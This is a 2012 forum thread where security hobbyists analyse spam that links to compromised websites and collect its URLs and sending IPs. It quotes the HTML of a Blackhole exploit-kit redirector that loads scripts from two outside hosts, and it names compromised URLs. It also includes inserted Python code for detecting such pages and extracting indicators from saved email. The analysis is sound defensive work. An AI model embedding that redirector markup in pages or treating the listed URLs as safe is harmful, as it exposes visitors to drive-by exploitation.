Author Topic: Spam with potentially malicious links  (Read 7460 times)


September 21, 2012, 09:22:03 pm

hhhobbit

I have been getting some spam recently that has lots of hacked web-sites.  At first I thought they may be doing an OS check because nothing happened and I use Linux.  Now they are doing stuff with their PHP script.  I am asked if I want to leave.  Stay for what?  If you ask me they are potential phish.  Here is the main folder:

http://www.securemecca.com/public/PeskySpammer/

The FalseADP and FalseLinkedIn folders in this zip contain the messages and some analysis files:

http://www.securemecca.com/public/PeskySpammer/PeskySpammer.7z

But I have also put the URL lists (CRLF format) that are in those folders at the top level:

http://www.securemecca.com/public/PeskySpammer/Z-ADP-URLs.txt
http://www.securemecca.com/public/PeskySpammer/Z-LinkedIn-URLs.txt

All of this is changing at least every other day.  Lately I have been forwarding the direct send to me messages on to PhishTank and will inform them next.  Infrequently, the SMTP daemon bars the message I am sending from being sent so obviously these URLs are going to somebody else as well.  I will inform PhishTank next.  But the latest batch that I looked at doesn't even have Linked In or ADP URLs in the messages.  All they have are the redirect links which are listed in the above two files. It is something you need to watch to see if it heads some place bad in the future.

September 21, 2012, 10:14:03 pm
Reply #1

dlipman

Looking at the Z-LinkedIn-URLs.txt file, URLs such as http://ftp.doidasesantas.com.br/jY8rTg5u/index.html fit the pattern of EXP/JS.Blacole.BI, which is a web page that points to two other web sites that load an obfuscated JavaScript which then points to a Blackhole Exploit site.

Looking at the Z-ADP-URLs.txt URLs, they fit the pattern too, but for the most part either the URL was removed or otherwise dealt with and I didn't see the following pattern which fits that of EXP/JS.Blacole.BI:

Code:
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="http://dominik-quary.de/d4JZEN4d/js.js"></script>
<script type="text/javascript" src="http://monioudis.ch/bgtS6CPx/js.js"></script>

</html>
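
A detection check for the page shape quoted in the reply above, as an added example that is not part of the original post or the poster's tooling. The eight-character directory followed by js.js is inferred from the URLs shown in this thread; the two-host threshold, the function names and the sample hosts are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Path shape taken from the script URLs quoted above: /<8 alphanumerics>/js.js
JS_PATH = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            self.srcs.append(src)

def suspicious_script_hosts(html):
    """Return sorted hosts of remote scripts whose path matches JS_PATH."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    hosts = set()
    for src in parser.srcs:
        parts = urlsplit(src)
        if parts.scheme in ("http", "https") and parts.hostname and JS_PATH.match(parts.path):
            hosts.add(parts.hostname.lower())
    return sorted(hosts)

def looks_like_redirector(html, page_host=None):
    """Flag a page pulling matching scripts from two or more foreign hosts.

    The threshold of two is an assumption based on the single sample in the thread.
    """
    foreign = [h for h in suspicious_script_hosts(html) if h != page_host]
    return len(foreign) >= 2

# Constructed inputs (documentation hosts, not taken from the URL lists).
SAMPLE_REDIRECTOR = """<html><h1>WAIT PLEASE</h1><h3>Loading...</h3>
<script type="text/javascript" src="http://cdn-one.example/aB3dE6gH/js.js"></script>
<script type="text/javascript" src="http://cdn-two.example/Zz91Qw0p/js.js"></script>
</html>"""
SAMPLE_BENIGN = """<html><h1>Welcome</h1>
<script src="http://shop.example/static/app.js"></script></html>"""
```

Matching on the script path rather than the "WAIT PLEASE" text keeps the check working if the visible wording changes.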

September 22, 2012, 09:06:56 pm
Reply #2

hhhobbit

You have the complete href URL.  After it comes the title which of course is
Linked-In for the Linked-In type messages.  If you open the PeskySpammer.7z
file you will see all of the messages saved in the subfolders FalseADP-00, and
FalseLinkedIn-00. They are saved AS-IS with no alteration of the contents.  IOW
spamLI-00001.eml is what was saved from email.

It is puzzling what they are doing because like you said, it looks like an incomplete
Blackhole.  When I first tested them the PHP script did nothing, but I work from
Linux.  In terms of OS detection I was incorrectly (and humorously) identified as
Android the other day.  Yesterday (2012-09-21), the PHP bit with a "I won't let you
get away" so I don't think the original PHP did anything for OS detection and in
fact did almost nothing at all.  I think they are using them to tune wherever they
are heading or for training.  Well, that is what it is unless you buy they are so dumb
as to send to HASH-USER@securemecca.com without knowing what they are doing.
I don't buy that but maybe I over-estimated them (doubtful).  So they have enough
stabbed servers to play around with and don't care that they become known.  But ...

1. It still gives the domains that already have injections that need to be patched.
Some of them have already fixed (maybe just partially) the problem.  Most have
done nothing and probably don't even know about it.  I have some multiples per
same domain but strip the multiples of the exact same URL duplicates down to
just one.

2. It gives me the sending IPs of their bot-nets which I am extracting and are in
these files which I now strip the duplicates down to just one:

http://www.securemecca.com/public/PeskySpammer/X-Originating-IP.txt
http://www.securemecca.com/public/PeskySpammer/X-Numeric.txt
(there are files of the same names in each of the sub-folders)

Again, they must have enough they don't care if those Windows machines are
fixed or are even so confident that they know nobody will ever get the bright
idea to find those machines to monitor what is going on.

That is not what I came to comment on.  What I came to say is that I have shifted
from CRLF -> LF for most files except the original messages (all email is in CRLF).
If on Windows use Notepad++, PSPad, Vim or other editors that handle LF only.
That makes it possible for me to update these two files hot (every few hours):

http://www.securemecca.com/public/PeskySpammer/Z-ADP-URLs.txt
http://www.securemecca.com/public/PeskySpammer/Z-LinkedIn-URLs.txt

Today it is Linked-In day.   Yesterday it was ADP.  The day before that it was
Linked-In again and the day before that it was ADP which was the first day. Before
then for over three months I was getting fake pharmaceuticals.  My bet is they are
training hacker wannabes in the Anonymous crowd.  But they are being so cheeky
it would not surprise me at all that they turn malicious at some point or finally do
what they pretend to be doing now but are not doing - phish.

Ditto for the fake pharmaceuticals.  I almost never saw those domains in my regular
accounts as spam.

Maybe the FBI is doing it - just teasing.
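
The list-building steps described in points 1 and 2 of the post above (pull the href URLs and the X-Originating-IP value out of each saved .eml, reduce exact duplicates to one, write LF-only lists), as an added example that is not the poster's own script. The bracketed header form, the function names and the sample messages are assumptions; the samples are constructed and use documentation addresses.

```python
import ipaddress
from email import message_from_bytes, policy
from html.parser import HTMLParser

class HrefCollector(HTMLParser):
    """Collect href values from <a> tags in an HTML body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href") if tag == "a" else None
        if href:
            self.hrefs.append(href.strip())

def extract_indicators(raw_eml):
    """Return (sending IP or None, list of href URLs) for one raw message."""
    msg = message_from_bytes(raw_eml, policy=policy.default)
    ip = None
    header = msg.get("X-Originating-IP")
    if header:
        try:  # assumed form: optional [brackets] around the address
            ip = str(ipaddress.ip_address(str(header).strip().strip("[]")))
        except ValueError:
            ip = None  # malformed value: skip it rather than record junk
    collector = HrefCollector()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            collector.feed(part.get_content())
    return ip, collector.hrefs

def build_lists(raw_messages):
    """Return (ip_list_text, url_list_text): exact duplicates removed, LF endings."""
    ips, urls = [], []
    for raw in raw_messages:
        ip, hrefs = extract_indicators(raw)
        ips.extend([ip] if ip else [])
        urls.extend(hrefs)
    as_lf = lambda items: "".join(f"{item}\n" for item in dict.fromkeys(items))
    return as_lf(ips), as_lf(urls)

def make_sample(ip, url):
    """Constructed CRLF message (not from the archive), documentation addresses."""
    return (f"From: a@sender.example\r\nSubject: constructed sample\r\n"
            f"X-Originating-IP: [{ip}]\r\nContent-Type: text/html\r\n\r\n"
            f'<html><a href="{url}">LinkedIn</a></html>\r\n').encode("ascii")

SAMPLES = [make_sample("203.0.113.7", "http://site-a.example/abcd1234/index.html"),
           make_sample("203.0.113.7", "http://site-a.example/abcd1234/index.html"),
           make_sample("198.51.100.9", "http://site-b.example/wxyz5678/index.html")]
```

The messages are read as bytes so the saved CRLF originals stay untouched; only the derived lists are written with LF endings.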